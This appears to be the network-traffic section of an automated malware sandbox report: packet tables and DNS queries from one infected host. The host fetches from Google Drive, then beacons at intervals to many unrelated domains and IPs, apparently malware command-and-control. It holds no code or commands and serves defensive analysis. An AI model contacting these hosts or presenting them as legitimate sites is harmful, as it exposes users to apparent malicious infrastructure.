                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964365005 CET804986064.32.22.102192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964593887 CET4986080192.168.11.2064.32.22.102
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964674950 CET4986080192.168.11.2064.32.22.102
                                                                                                                                                                                                                              Feb 21, 2022 16:56:39.121947050 CET804986064.32.22.102192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.567971945 CET4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.579818010 CET8049863217.160.0.98192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.580033064 CET4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.580063105 CET4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.592143059 CET8049863217.160.0.98192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.600548983 CET8049863217.160.0.98192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.600626945 CET8049863217.160.0.98192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.601018906 CET4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.601069927 CET4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.613250971 CET8049863217.160.0.98192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.611805916 CET4986480192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.634903908 CET804986435.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.635080099 CET4986480192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.635396004 CET4986480192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658253908 CET804986435.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658315897 CET804986435.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658353090 CET804986435.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658660889 CET4986480192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658708096 CET4986480192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.681543112 CET804986435.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.672640085 CET4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.828862906 CET804986566.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.829103947 CET4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.829157114 CET4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.985220909 CET804986566.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:08.047563076 CET804986566.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:08.047616959 CET804986566.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:08.047842979 CET4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:57:09.843869925 CET4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:57:10.000150919 CET804986566.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.831267118 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.839226007 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.839553118 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.839608908 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.847635984 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887648106 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887728930 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887780905 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887833118 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887897015 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887955904 CET804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887999058 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888061047 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888139963 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.888185978 CET4986880192.168.11.2023.227.38.74
                                                                                                                                                                                                                              Feb 21, 2022 16:57:35.995588064 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095063925 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095292091 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095345974 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.195632935 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.603353977 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622030020 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622102976 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622350931 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622414112 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.703087091 CET8049869185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.703320026 CET4986980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.618428946 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.628979921 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.629241943 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.629331112 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.639678955 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798185110 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798249960 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798680067 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798742056 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.808984041 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.805346966 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.971765995 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.971988916 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.972162008 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.138446093 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.475931883 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.555888891 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.555937052 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.556097031 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.556147099 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.642950058 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.643349886 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.490638971 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.498826027 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.499041080 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.499147892 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.507361889 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.668587923 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.668638945 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.669055939 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.669107914 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.679153919 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.693661928 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716332912 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716553926 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716633081 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739124060 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739197969 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739234924 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739554882 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739605904 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.761929989 CET804987535.214.4.70192.168.11.20

                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Feb 21, 2022 16:50:16.201951981 CET5824653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:50:16.210630894 CET53582461.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.058429003 CET6417353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.104245901 CET53641731.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.729531050 CET5426253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.804508924 CET53542621.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.165147066 CET6167753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.193876028 CET53616771.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.538547039 CET6307953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.727771997 CET53630791.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.772079945 CET5941153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.797167063 CET53594111.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.130063057 CET6267453192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.538184881 CET53626741.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.627624035 CET6308453192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.807014942 CET53630841.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:06.845973969 CET6403053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:06.899840117 CET53640301.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:11.907682896 CET6002553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:11.925822020 CET53600251.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:16.937150955 CET5845253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.018098116 CET53584521.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.638762951 CET6347353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.816301107 CET53634731.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.012419939 CET5481853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.440529108 CET53548181.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.136816025 CET5999253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.168859005 CET53599921.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:39.291989088 CET4923053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:39.347606897 CET53492301.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.352612019 CET6021853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.369036913 CET53602181.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:49.430459023 CET6185253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:52:49.444694996 CET53618521.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:53:08.503523111 CET5411753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:53:08.774166107 CET53541171.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:53:19.204130888 CET5261553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:53:19.221950054 CET53526151.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.235431910 CET5888953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.431921959 CET53588891.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.765678883 CET5067553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.943470001 CET53506751.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.075576067 CET5812953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.260562897 CET53581291.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.195796013 CET6354153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.257251978 CET6354153192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.536137104 CET53635419.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.734293938 CET53635411.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.395864964 CET6059153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.432866096 CET53605911.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.312161922 CET5932853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.343334913 CET53593281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.450026035 CET6028653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.473849058 CET53602861.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.010827065 CET6370953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.022368908 CET53637091.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.026734114 CET5750953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.087418079 CET5750953192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET53575099.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET53575091.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.383620977 CET6064853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.445580006 CET6064853192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.489294052 CET53606489.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.576991081 CET53606481.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.491822958 CET6214653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.553824902 CET6214653192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.981295109 CET53621469.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.985958099 CET53621461.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.940363884 CET6432853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.984378099 CET53643281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.126812935 CET5494053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.172348022 CET53549401.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.234884977 CET6202253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.265649080 CET53620221.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.275760889 CET5076253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.337985992 CET5076253192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341202974 CET53507629.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341559887 CET53507621.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.430728912 CET5659053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.444781065 CET53565901.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.613698959 CET4931753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET53493171.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:43.980432987 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:44.060471058 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:45.080615997 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094183922 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094238997 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517788887 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517807961 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518302917 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518939972 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.345483065 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347796917 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347865105 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.525007010 CET5654253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.535520077 CET53565421.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.550146103 CET6246353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.567264080 CET53624631.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.859069109 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.920610905 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:15.935929060 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951534033 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951581955 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781239033 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781336069 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781379938 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781862020 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.794153929 CET5422853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET53542281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.901686907 CET6344753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.963957071 CET6344753192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.989701033 CET53634471.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:31.304647923 CET53634479.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.677630901 CET5281653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.687225103 CET53528161.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.753551006 CET5313853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.765171051 CET53531381.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.641823053 CET5799153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.704071045 CET5799153192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET53579911.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET53579919.9.9.9192.168.11.20

                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                              Feb 21, 2022 16:50:16.201951981 CET192.168.11.201.1.1.10xad13Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.058429003 CET192.168.11.201.1.1.10x8cc0Standard query (0)doc-04-08-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.729531050 CET192.168.11.201.1.1.10x19cStandard query (0)www.neonewway.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.165147066 CET192.168.11.201.1.1.10xd047Standard query (0)www.7bkj.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.538547039 CET192.168.11.201.1.1.10x55bfStandard query (0)www.waktuk.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.772079945 CET192.168.11.201.1.1.10xc278Standard query (0)www.quanqiu55555.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.130063057 CET192.168.11.201.1.1.10x5bbfStandard query (0)www.mariachinuevozacatecas24-7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.627624035 CET192.168.11.201.1.1.10x6593Standard query (0)www.antoniopasciuti.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:06.845973969 CET192.168.11.201.1.1.10x37d8Standard query (0)www.marvinhull.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:11.907682896 CET192.168.11.201.1.1.10xee57Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:16.937150955 CET192.168.11.201.1.1.10xfdafStandard query (0)www.dreamintelligent.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.638762951 CET192.168.11.201.1.1.10xc9a0Standard query (0)www.josiemaran-supernatural.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.012419939 CET192.168.11.201.1.1.10xb86fStandard query (0)www.rsxrsh.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.136816025 CET192.168.11.201.1.1.10x2eddStandard query (0)www.noireimpactcollective.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:39.291989088 CET192.168.11.201.1.1.10xa72dStandard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.352612019 CET192.168.11.201.1.1.10x43cbStandard query (0)www.ooo-club.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:52:49.430459023 CET192.168.11.201.1.1.10x2c20Standard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:08.503523111 CET192.168.11.201.1.1.10x4352Standard query (0)www.4huav946.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:19.204130888 CET192.168.11.201.1.1.10x3bfaStandard query (0)www.personas1web.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.235431910 CET192.168.11.201.1.1.10xc235Standard query (0)www.itservon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.765678883 CET192.168.11.201.1.1.10x1219Standard query (0)www.fairytalepageants.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.075576067 CET192.168.11.201.1.1.10x68acStandard query (0)www.buresdx.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.195796013 CET192.168.11.201.1.1.10x8bc8Standard query (0)www.vendasdigitaisonline.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.257251978 CET192.168.11.209.9.9.90x8bc8Standard query (0)www.vendasdigitaisonline.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.395864964 CET192.168.11.201.1.1.10x41acStandard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.312161922 CET192.168.11.201.1.1.10x4985Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.450026035 CET192.168.11.201.1.1.10x46c3Standard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.010827065 CET192.168.11.201.1.1.10xc90aStandard query (0)www.owensigns.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.026734114 CET192.168.11.201.1.1.10x209cStandard query (0)www.mariachinuevozacatecas24-7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.087418079 CET192.168.11.209.9.9.90x209cStandard query (0)www.mariachinuevozacatecas24-7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.383620977 CET192.168.11.201.1.1.10xbd8bStandard query (0)www.percentrostered.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.445580006 CET192.168.11.209.9.9.90xbd8bStandard query (0)www.percentrostered.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.491822958 CET192.168.11.201.1.1.10x9533Standard query (0)www.nagradi7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.553824902 CET192.168.11.209.9.9.90x9533Standard query (0)www.nagradi7.comA (IP address)IN (0x0001)
